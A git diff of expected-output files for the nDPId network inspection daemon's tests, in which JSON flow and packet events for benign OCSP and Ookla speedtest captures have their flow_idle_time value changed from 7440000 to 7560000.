+00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="} 
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":275,"packets-processed":274,"total-skipped-flows":0,"total-l4-data-len":23358,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1623229632695} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"} 
-00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
-00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"} -00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="} 
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
-00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"} 
+00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"} +00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="} 
+00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":344,"packets-processed":344,"total-skipped-flows":0,"total-l4-data-len":33113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":67,"global_ts_msec":1623229968257} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 344/344 diff --git a/test/results/ookla.pcap.out b/test/results/ookla.pcap.out index b00a11a2f..ad79ccfd1 100644 --- a/test/results/ookla.pcap.out +++ b/test/results/ookla.pcap.out 
@@ -1,17 +1,17 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ookla.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1491069108756} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069108756,"flow_last_seen":1491069108756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069108756,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"} 